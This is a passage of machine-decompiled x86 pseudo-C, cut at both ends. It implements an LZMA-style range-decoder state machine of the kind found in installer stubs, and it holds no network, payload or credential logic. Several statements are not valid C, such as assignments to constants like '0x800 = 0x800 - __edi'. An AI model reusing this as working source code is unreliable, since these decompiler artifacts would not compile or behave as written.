                                                                                                                                                                                      							_t591 = (_v20 >> 0xb) * _t610;
                                                                                                                                                                                      							__eflags = _v16 - _t591;
                                                                                                                                                                                      							if(_v16 >= _t591) {
                                                                                                                                                                                      								_v20 = _v20 - _t591;
                                                                                                                                                                                      								_v16 = _v16 - _t591;
                                                                                                                                                                                      								_v68 = 1;
                                                                                                                                                                                      								_t560 = _t559 - (_t559 >> 5);
                                                                                                                                                                                      								__eflags = _t560;
                                                                                                                                                                                      								 *_t626 = _t560;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_v20 = _t591;
                                                                                                                                                                                      								_v68 = _v68 & 0x00000000;
                                                                                                                                                                                      								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _v20 - 0x1000000;
                                                                                                                                                                                      							if(_v20 >= 0x1000000) {
                                                                                                                                                                                      								goto L142;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								goto L140;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						case 5:
                                                                                                                                                                                      							L140:
                                                                                                                                                                                      							__eflags = _v112;
                                                                                                                                                                                      							if(_v112 == 0) {
                                                                                                                                                                                      								_v140 = 5;
                                                                                                                                                                                      								goto L173;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_v20 = _v20 << 8;
                                                                                                                                                                                      							_v112 = _v112 - 1;
                                                                                                                                                                                      							_t464 =  &_v116;
                                                                                                                                                                                      							 *_t464 = _v116 + 1;
                                                                                                                                                                                      							__eflags =  *_t464;
                                                                                                                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                      							L142:
                                                                                                                                                                                      							_t561 = _v136;
                                                                                                                                                                                      							goto L143;
                                                                                                                                                                                      						case 6:
                                                                                                                                                                                      							__edx = 0;
                                                                                                                                                                                      							__eflags = _v68;
                                                                                                                                                                                      							if(_v68 != 0) {
                                                                                                                                                                                      								__eax = _v8;
                                                                                                                                                                                      								__ecx = _v60;
                                                                                                                                                                                      								_v56 = 1;
                                                                                                                                                                                      								_v136 = 7;
                                                                                                                                                                                      								__esi = _v8 + 0x180 + _v60 * 2;
                                                                                                                                                                                      								goto L135;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eax = _v96 & 0x000000ff;
                                                                                                                                                                                      							__esi = _v100;
                                                                                                                                                                                      							__cl = 8;
                                                                                                                                                                                      							__cl = 8 - _v64;
                                                                                                                                                                                      							__esi = _v100 & _v28;
                                                                                                                                                                                      							__eax = (_v96 & 0x000000ff) >> 8;
                                                                                                                                                                                      							__ecx = _v64;
                                                                                                                                                                                      							__esi = (_v100 & _v28) << 8;
                                                                                                                                                                                      							__ecx = _v8;
                                                                                                                                                                                      							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                                                                                                                                                      							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                                                                                                                                                      							__eflags = _v60 - 4;
                                                                                                                                                                                      							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                                                                                                                      							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                                                                                                                      							if(_v60 >= 4) {
                                                                                                                                                                                      								__eflags = _v60 - 0xa;
                                                                                                                                                                                      								if(_v60 >= 0xa) {
                                                                                                                                                                                      									_t103 =  &_v60;
                                                                                                                                                                                      									 *_t103 = _v60 - 6;
                                                                                                                                                                                      									__eflags =  *_t103;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									_v60 = _v60 - 3;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_v60 = 0;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _v56 - __edx;
                                                                                                                                                                                      							if(_v56 == __edx) {
                                                                                                                                                                                      								__ebx = 0;
                                                                                                                                                                                      								__ebx = 1;
                                                                                                                                                                                      								goto L63;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eax = _v24;
                                                                                                                                                                                      							__eax = _v24 - _v48;
                                                                                                                                                                                      							__eflags = __eax - _v120;
                                                                                                                                                                                      							if(__eax >= _v120) {
                                                                                                                                                                                      								__eax = __eax + _v120;
                                                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx = _v12;
                                                                                                                                                                                      							__ebx = 0;
                                                                                                                                                                                      							__ebx = 1;
                                                                                                                                                                                      							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                      							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                      							goto L43;
                                                                                                                                                                                      						case 7:
                                                                                                                                                                                      							__eflags = _v68 - 1;
                                                                                                                                                                                      							if(_v68 != 1) {
                                                                                                                                                                                      								__eax = _v40;
                                                                                                                                                                                      								_v132 = 0x16;
                                                                                                                                                                                      								_v36 = _v40;
                                                                                                                                                                                      								__eax = _v44;
                                                                                                                                                                                      								_v40 = _v44;
                                                                                                                                                                                      								__eax = _v48;
                                                                                                                                                                                      								_v44 = _v48;
                                                                                                                                                                                      								__eax = 0;
                                                                                                                                                                                      								__eflags = _v60 - 7;
                                                                                                                                                                                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                      								__al = __al & 0x000000fd;
                                                                                                                                                                                      								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                      								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                      								__eax = _v8;
                                                                                                                                                                                      								__eax = _v8 + 0x664;
                                                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                                                      								_v92 = __eax;
                                                                                                                                                                                      								goto L71;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eax = _v8;
                                                                                                                                                                                      							__ecx = _v60;
                                                                                                                                                                                      							_v136 = 8;
                                                                                                                                                                                      							__esi = _v8 + 0x198 + _v60 * 2;
                                                                                                                                                                                      							goto L135;
                                                                                                                                                                                      						case 8:
                                                                                                                                                                                      							__eflags = _v68;
                                                                                                                                                                                      							if(_v68 != 0) {
                                                                                                                                                                                      								__eax = _v8;
                                                                                                                                                                                      								__ecx = _v60;
                                                                                                                                                                                      								_v136 = 0xa;
                                                                                                                                                                                      								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								__eax = _v60;
                                                                                                                                                                                      								__ecx = _v8;
                                                                                                                                                                                      								__eax = _v60 + 0xf;
                                                                                                                                                                                      								_v136 = 9;
                                                                                                                                                                                      								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                                                                                                                                                      								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L135;
                                                                                                                                                                                      						case 9:
                                                                                                                                                                                      							__eflags = _v68;
                                                                                                                                                                                      							if(_v68 != 0) {
                                                                                                                                                                                      								goto L92;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _v100;
                                                                                                                                                                                      							if(_v100 == 0) {
                                                                                                                                                                                      								goto L174;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eax = 0;
                                                                                                                                                                                      							__eflags = _v60 - 7;
                                                                                                                                                                                      							_t264 = _v60 - 7 >= 0;
                                                                                                                                                                                      							__eflags = _t264;
                                                                                                                                                                                      							0 | _t264 = _t264 + _t264 + 9;
                                                                                                                                                                                      							_v60 = _t264 + _t264 + 9;
                                                                                                                                                                                      							goto L78;
                                                                                                                                                                                      						case 0xa:
                                                                                                                                                                                      							__eflags = _v68;
                                                                                                                                                                                      							if(_v68 != 0) {
                                                                                                                                                                                      								__eax = _v8;
                                                                                                                                                                                      								__ecx = _v60;
                                                                                                                                                                                      								_v136 = 0xb;
                                                                                                                                                                                      								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                                                                                                                                                      								goto L135;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eax = _v44;
                                                                                                                                                                                      							goto L91;
                                                                                                                                                                                      						case 0xb:
                                                                                                                                                                                      							__eflags = _v68;
                                                                                                                                                                                      							if(_v68 != 0) {
                                                                                                                                                                                      								__ecx = _v40;
                                                                                                                                                                                      								__eax = _v36;
                                                                                                                                                                                      								_v36 = _v40;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								__eax = _v40;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx = _v44;
                                                                                                                                                                                      							_v40 = _v44;
                                                                                                                                                                                      							L91:
                                                                                                                                                                                      							__ecx = _v48;
                                                                                                                                                                                      							_v48 = __eax;
                                                                                                                                                                                      							_v44 = _v48;
                                                                                                                                                                                      							L92:
                                                                                                                                                                                      							__eax = _v8;
                                                                                                                                                                                      							_v132 = 0x15;
                                                                                                                                                                                      							__eax = _v8 + 0xa68;
                                                                                                                                                                                      							_v92 = _v8 + 0xa68;
                                                                                                                                                                                      							goto L71;
                                                                                                                                                                                      						case 0xc:
                                                                                                                                                                                      							L102:
                                                                                                                                                                                      							__eflags = _v112;
                                                                                                                                                                                      							if(_v112 == 0) {
                                                                                                                                                                                      								_v140 = 0xc;
                                                                                                                                                                                      								goto L173;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx = _v116;
                                                                                                                                                                                      							__eax = _v16;
                                                                                                                                                                                      							_v20 = _v20 << 8;
                                                                                                                                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                                      							_v112 = _v112 - 1;
                                                                                                                                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                      							_t340 =  &_v116;
                                                                                                                                                                                      							 *_t340 = _v116 + 1;
                                                                                                                                                                                      							__eflags =  *_t340;
                                                                                                                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                      							__eax = _v48;
                                                                                                                                                                                      							goto L104;
                                                                                                                                                                                      						case 0xd:
                                                                                                                                                                                      							L39:
                                                                                                                                                                                      							__eflags = _v112;
                                                                                                                                                                                      							if(_v112 == 0) {
                                                                                                                                                                                      								_v140 = 0xd;
                                                                                                                                                                                      								goto L173;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx = _v116;
                                                                                                                                                                                      							__eax = _v16;
                                                                                                                                                                                      							_v20 = _v20 << 8;
                                                                                                                                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                                      							_v112 = _v112 - 1;
                                                                                                                                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                      							_t127 =  &_v116;
                                                                                                                                                                                      							 *_t127 = _v116 + 1;
                                                                                                                                                                                      							__eflags =  *_t127;
                                                                                                                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                      							L41:
                                                                                                                                                                                      							__eax = _v68;
                                                                                                                                                                                      							__eflags = _v76 - _v68;
                                                                                                                                                                                      							if(_v76 != _v68) {
                                                                                                                                                                                      								goto L50;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = __ebx - 0x100;
                                                                                                                                                                                      							if(__ebx >= 0x100) {
                                                                                                                                                                                      								goto L56;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							L43:
                                                                                                                                                                                      							__eax = _v95 & 0x000000ff;
                                                                                                                                                                                      							_v95 = _v95 << 1;
                                                                                                                                                                                      							__ecx = _v92;
                                                                                                                                                                                      							__eax = (_v95 & 0x000000ff) >> 7;
                                                                                                                                                                                      							_v76 = __eax;
                                                                                                                                                                                      							__eax = __eax + 1;
                                                                                                                                                                                      							__eax = __eax << 8;
                                                                                                                                                                                      							__eax = __eax + __ebx;
                                                                                                                                                                                      							__esi = _v92 + __eax * 2;
                                                                                                                                                                                      							_v20 = _v20 >> 0xb;
                                                                                                                                                                                      							__ax =  *__esi;
                                                                                                                                                                                      							_v88 = __esi;
                                                                                                                                                                                      							__edx = __ax & 0x0000ffff;
                                                                                                                                                                                      							__ecx = (_v20 >> 0xb) * __edx;
                                                                                                                                                                                      							__eflags = _v16 - __ecx;
                                                                                                                                                                                      							if(_v16 >= __ecx) {
                                                                                                                                                                                      								_v20 = _v20 - __ecx;
                                                                                                                                                                                      								_v16 = _v16 - __ecx;
                                                                                                                                                                                      								__cx = __ax;
                                                                                                                                                                                      								_v68 = 1;
                                                                                                                                                                                      								__cx = __ax >> 5;
                                                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                                                      								__ebx = __ebx + __ebx + 1;
                                                                                                                                                                                      								 *__esi = __ax;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_v68 = _v68 & 0x00000000;
                                                                                                                                                                                      								_v20 = __ecx;
                                                                                                                                                                                      								0x800 = 0x800 - __edx;
                                                                                                                                                                                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                                      								__ebx = __ebx + __ebx;
                                                                                                                                                                                      								 *__esi = __cx;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _v20 - 0x1000000;
                                                                                                                                                                                      							_v72 = __ebx;
                                                                                                                                                                                      							if(_v20 >= 0x1000000) {
                                                                                                                                                                                      								goto L41;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								goto L39;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						case 0xe:
                                                                                                                                                                                      							L48:
                                                                                                                                                                                      							__eflags = _v112;
                                                                                                                                                                                      							if(_v112 == 0) {
                                                                                                                                                                                      								_v140 = 0xe;
                                                                                                                                                                                      								goto L173;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx = _v116;
                                                                                                                                                                                      							__eax = _v16;
                                                                                                                                                                                      							_v20 = _v20 << 8;
                                                                                                                                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                                      							_v112 = _v112 - 1;
                                                                                                                                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                      							_t161 =  &_v116;
                                                                                                                                                                                      							 *_t161 = _v116 + 1;
                                                                                                                                                                                      							__eflags =  *_t161;
                                                                                                                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                      							while(1) {
                                                                                                                                                                                      								L50:
                                                                                                                                                                                      								__eflags = __ebx - 0x100;
                                                                                                                                                                                      								if(__ebx >= 0x100) {
                                                                                                                                                                                      									break;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eax = _v92;
                                                                                                                                                                                      								__edx = __ebx + __ebx;
                                                                                                                                                                                      								__ecx = _v20;
                                                                                                                                                                                      								__esi = __edx + __eax;
                                                                                                                                                                                      								__ecx = _v20 >> 0xb;
                                                                                                                                                                                      								__ax =  *__esi;
                                                                                                                                                                                      								_v88 = __esi;
                                                                                                                                                                                      								__edi = __ax & 0x0000ffff;
                                                                                                                                                                                      								__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                                                                                      								__eflags = _v16 - __ecx;
                                                                                                                                                                                      								if(_v16 >= __ecx) {
                                                                                                                                                                                      									_v20 = _v20 - __ecx;
                                                                                                                                                                                      									_v16 = _v16 - __ecx;
                                                                                                                                                                                      									__cx = __ax;
                                                                                                                                                                                      									_t175 = __edx + 1; // 0x1
                                                                                                                                                                                      									__ebx = _t175;
                                                                                                                                                                                      									__cx = __ax >> 5;
                                                                                                                                                                                      									__eflags = __eax;
                                                                                                                                                                                      									 *__esi = __ax;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									_v20 = __ecx;
                                                                                                                                                                                      									0x800 = 0x800 - __edi;
                                                                                                                                                                                      									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                      									__ebx = __ebx + __ebx;
                                                                                                                                                                                      									 *__esi = __cx;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags = _v20 - 0x1000000;
                                                                                                                                                                                      								_v72 = __ebx;
                                                                                                                                                                                      								if(_v20 >= 0x1000000) {
                                                                                                                                                                                      									continue;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									goto L48;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							L56:
                                                                                                                                                                                      							_t178 =  &_v56;
                                                                                                                                                                                      							 *_t178 = _v56 & 0x00000000;
                                                                                                                                                                                      							__eflags =  *_t178;
                                                                                                                                                                                      							goto L57;
                                                                                                                                                                                      						case 0xf:
                                                                                                                                                                                      							L60:
                                                                                                                                                                                      							__eflags = _v112;
                                                                                                                                                                                      							if(_v112 == 0) {
                                                                                                                                                                                      								_v140 = 0xf;
                                                                                                                                                                                      								goto L173;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx = _v116;
                                                                                                                                                                                      							__eax = _v16;
                                                                                                                                                                                      							_v20 = _v20 << 8;
                                                                                                                                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                                      							_v112 = _v112 - 1;
                                                                                                                                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                      							_t208 =  &_v116;
                                                                                                                                                                                      							 *_t208 = _v116 + 1;
                                                                                                                                                                                      							__eflags =  *_t208;
                                                                                                                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                      							L62:
                                                                                                                                                                                      							__eflags = __ebx - 0x100;
                                                                                                                                                                                      							if(__ebx >= 0x100) {
                                                                                                                                                                                      								L57:
                                                                                                                                                                                      								__al = _v72;
                                                                                                                                                                                      								_v96 = _v72;
                                                                                                                                                                                      								goto L58;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							L63:
                                                                                                                                                                                      							__eax = _v92;
                                                                                                                                                                                      							__edx = __ebx + __ebx;
                                                                                                                                                                                      							__ecx = _v20;
                                                                                                                                                                                      							__esi = __edx + __eax;
                                                                                                                                                                                      							__ecx = _v20 >> 0xb;
                                                                                                                                                                                      							__ax =  *__esi;
                                                                                                                                                                                      							_v88 = __esi;
                                                                                                                                                                                      							__edi = __ax & 0x0000ffff;
                                                                                                                                                                                      							__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                                                                                      							__eflags = _v16 - __ecx;
                                                                                                                                                                                      							if(_v16 >= __ecx) {
                                                                                                                                                                                      								_v20 = _v20 - __ecx;
                                                                                                                                                                                      								_v16 = _v16 - __ecx;
                                                                                                                                                                                      								__cx = __ax;
                                                                                                                                                                                      								_t222 = __edx + 1; // 0x1
                                                                                                                                                                                      								__ebx = _t222;
                                                                                                                                                                                      								__cx = __ax >> 5;
                                                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                                                      								 *__esi = __ax;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_v20 = __ecx;
                                                                                                                                                                                      								0x800 = 0x800 - __edi;
                                                                                                                                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                      								__ebx = __ebx + __ebx;
                                                                                                                                                                                      								 *__esi = __cx;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _v20 - 0x1000000;
                                                                                                                                                                                      							_v72 = __ebx;
                                                                                                                                                                                      							if(_v20 >= 0x1000000) {
                                                                                                                                                                                      								goto L62;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								goto L60;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						case 0x10:
                                                                                                                                                                                      							L112:
                                                                                                                                                                                      							__eflags = _v112;
                                                                                                                                                                                      							if(_v112 == 0) {
                                                                                                                                                                                      								_v140 = 0x10;
                                                                                                                                                                                      								goto L173;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx = _v116;
                                                                                                                                                                                      							__eax = _v16;
                                                                                                                                                                                      							_v20 = _v20 << 8;
                                                                                                                                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                                      							_v112 = _v112 - 1;
                                                                                                                                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                      							_t371 =  &_v116;
                                                                                                                                                                                      							 *_t371 = _v116 + 1;
                                                                                                                                                                                      							__eflags =  *_t371;
                                                                                                                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                      							goto L114;
                                                                                                                                                                                      						case 0x11:
                                                                                                                                                                                      							L71:
                                                                                                                                                                                      							__esi = _v92;
                                                                                                                                                                                      							_v136 = 0x12;
                                                                                                                                                                                      							goto L135;
                                                                                                                                                                                      						case 0x12:
                                                                                                                                                                                      							__eflags = _v68;
                                                                                                                                                                                      							if(_v68 != 0) {
                                                                                                                                                                                      								__eax = _v92;
                                                                                                                                                                                      								_v136 = 0x13;
                                                                                                                                                                                      								__esi = _v92 + 2;
                                                                                                                                                                                      								L135:
                                                                                                                                                                                      								_v88 = _t626;
                                                                                                                                                                                      								goto L136;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eax = _v80;
                                                                                                                                                                                      							_v52 = _v52 & 0x00000000;
                                                                                                                                                                                      							__ecx = _v92;
                                                                                                                                                                                      							__eax = _v80 << 4;
                                                                                                                                                                                      							__eflags = __eax;
                                                                                                                                                                                      							__eax = _v92 + __eax + 4;
                                                                                                                                                                                      							goto L133;
                                                                                                                                                                                      						case 0x13:
                                                                                                                                                                                      							__eflags = _v68;
                                                                                                                                                                                      							if(_v68 != 0) {
                                                                                                                                                                                      								_t475 =  &_v92;
                                                                                                                                                                                      								 *_t475 = _v92 + 0x204;
                                                                                                                                                                                      								__eflags =  *_t475;
                                                                                                                                                                                      								_v52 = 0x10;
                                                                                                                                                                                      								_v68 = 8;
                                                                                                                                                                                      								L147:
                                                                                                                                                                                      								_v128 = 0x14;
                                                                                                                                                                                      								goto L148;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eax = _v80;
                                                                                                                                                                                      							__ecx = _v92;
                                                                                                                                                                                      							__eax = _v80 << 4;
                                                                                                                                                                                      							_v52 = 8;
                                                                                                                                                                                      							__eax = _v92 + (_v80 << 4) + 0x104;
                                                                                                                                                                                      							L133:
                                                                                                                                                                                      							_v92 = __eax;
                                                                                                                                                                                      							_v68 = 3;
                                                                                                                                                                                      							goto L147;
                                                                                                                                                                                      						case 0x14:
                                                                                                                                                                                      							_v52 = _v52 + __ebx;
                                                                                                                                                                                      							__eax = _v132;
                                                                                                                                                                                      							goto L143;
                                                                                                                                                                                      						case 0x15:
                                                                                                                                                                                      							__eax = 0;
                                                                                                                                                                                      							__eflags = _v60 - 7;
                                                                                                                                                                                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                      							__al = __al & 0x000000fd;
                                                                                                                                                                                      							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                      							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                      							goto L123;
                                                                                                                                                                                      						case 0x16:
                                                                                                                                                                                      							__eax = _v52;
                                                                                                                                                                                      							__eflags = __eax - 4;
                                                                                                                                                                                      							if(__eax >= 4) {
                                                                                                                                                                                      								_push(3);
                                                                                                                                                                                      								_pop(__eax);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx = _v8;
                                                                                                                                                                                      							_v68 = 6;
                                                                                                                                                                                      							__eax = __eax << 7;
                                                                                                                                                                                      							_v128 = 0x19;
                                                                                                                                                                                      							_v92 = __eax;
                                                                                                                                                                                      							goto L148;
                                                                                                                                                                                      						case 0x17:
                                                                                                                                                                                      							L148:
                                                                                                                                                                                      							__eax = _v68;
                                                                                                                                                                                      							_v84 = 1;
                                                                                                                                                                                      							_v76 = _v68;
                                                                                                                                                                                      							goto L152;
                                                                                                                                                                                      						case 0x18:
                                                                                                                                                                                      							L149:
                                                                                                                                                                                      							__eflags = _v112;
                                                                                                                                                                                      							if(_v112 == 0) {
                                                                                                                                                                                      								_v140 = 0x18;
                                                                                                                                                                                      								goto L173;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx = _v116;
                                                                                                                                                                                      							__eax = _v16;
                                                                                                                                                                                      							_v20 = _v20 << 8;
                                                                                                                                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                                      							_v112 = _v112 - 1;
                                                                                                                                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                      							_t490 =  &_v116;
                                                                                                                                                                                      							 *_t490 = _v116 + 1;
                                                                                                                                                                                      							__eflags =  *_t490;
                                                                                                                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                      							L151:
                                                                                                                                                                                      							_t493 =  &_v76;
                                                                                                                                                                                      							 *_t493 = _v76 - 1;
                                                                                                                                                                                      							__eflags =  *_t493;
                                                                                                                                                                                      							L152:
                                                                                                                                                                                      							__eflags = _v76;
                                                                                                                                                                                      							if(_v76 <= 0) {
                                                                                                                                                                                      								__ecx = _v68;
                                                                                                                                                                                      								__ebx = _v84;
                                                                                                                                                                                      								0 = 1;
                                                                                                                                                                                      								__eax = 1 << __cl;
                                                                                                                                                                                      								__ebx = _v84 - (1 << __cl);
                                                                                                                                                                                      								__eax = _v128;
                                                                                                                                                                                      								_v72 = __ebx;
                                                                                                                                                                                      								L143:
                                                                                                                                                                                      								_v140 = _t561;
                                                                                                                                                                                      								goto L3;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eax = _v84;
                                                                                                                                                                                      							_v20 = _v20 >> 0xb;
                                                                                                                                                                                      							__edx = _v84 + _v84;
                                                                                                                                                                                      							__eax = _v92;
                                                                                                                                                                                      							__esi = __edx + __eax;
                                                                                                                                                                                      							_v88 = __esi;
                                                                                                                                                                                      							__ax =  *__esi;
                                                                                                                                                                                      							__edi = __ax & 0x0000ffff;
                                                                                                                                                                                      							__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                                                                                      							__eflags = _v16 - __ecx;
                                                                                                                                                                                      							if(_v16 >= __ecx) {
                                                                                                                                                                                      								_v20 = _v20 - __ecx;
                                                                                                                                                                                      								_v16 = _v16 - __ecx;
                                                                                                                                                                                      								__cx = __ax;
                                                                                                                                                                                      								__cx = __ax >> 5;
                                                                                                                                                                                      								__eax = __eax - __ecx;
                                                                                                                                                                                      								__edx = __edx + 1;
                                                                                                                                                                                      								__eflags = __edx;
                                                                                                                                                                                      								 *__esi = __ax;
                                                                                                                                                                                      								_v84 = __edx;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_v20 = __ecx;
                                                                                                                                                                                      								0x800 = 0x800 - __edi;
                                                                                                                                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                      								_v84 = _v84 << 1;
                                                                                                                                                                                      								 *__esi = __cx;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _v20 - 0x1000000;
                                                                                                                                                                                      							if(_v20 >= 0x1000000) {
                                                                                                                                                                                      								goto L151;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								goto L149;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						case 0x19:
                                                                                                                                                                                      							__eflags = __ebx - 4;
                                                                                                                                                                                      							if(__ebx < 4) {
                                                                                                                                                                                      								_v48 = __ebx;
                                                                                                                                                                                      								L122:
                                                                                                                                                                                      								_t399 =  &_v48;
                                                                                                                                                                                      								 *_t399 = _v48 + 1;
                                                                                                                                                                                      								__eflags =  *_t399;
                                                                                                                                                                                      								L123:
                                                                                                                                                                                      								__eax = _v48;
                                                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                                                      								if(__eax == 0) {
                                                                                                                                                                                      									_v52 = _v52 | 0xffffffff;
                                                                                                                                                                                      									goto L173;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags = __eax - _v100;
                                                                                                                                                                                      								if(__eax > _v100) {
                                                                                                                                                                                      									goto L174;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_v52 = _v52 + 2;
                                                                                                                                                                                      								__eax = _v52;
                                                                                                                                                                                      								_t406 =  &_v100;
                                                                                                                                                                                      								 *_t406 = _v100 + _v52;
                                                                                                                                                                                      								__eflags =  *_t406;
                                                                                                                                                                                      								goto L126;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx = __ebx;
                                                                                                                                                                                      							__eax = __ebx;
                                                                                                                                                                                      							__ecx = __ebx >> 1;
                                                                                                                                                                                      							__eax = __ebx & 0x00000001;
                                                                                                                                                                                      							__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                                      							__al = __al | 0x00000002;
                                                                                                                                                                                      							__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                                      							__eflags = __ebx - 0xe;
                                                                                                                                                                                      							_v48 = __eax;
                                                                                                                                                                                      							if(__ebx >= 0xe) {
                                                                                                                                                                                      								__ebx = 0;
                                                                                                                                                                                      								_v76 = __ecx;
                                                                                                                                                                                      								L105:
                                                                                                                                                                                      								__eflags = _v76;
                                                                                                                                                                                      								if(_v76 <= 0) {
                                                                                                                                                                                      									__eax = __eax + __ebx;
                                                                                                                                                                                      									_v68 = 4;
                                                                                                                                                                                      									_v48 = __eax;
                                                                                                                                                                                      									__eax = _v8;
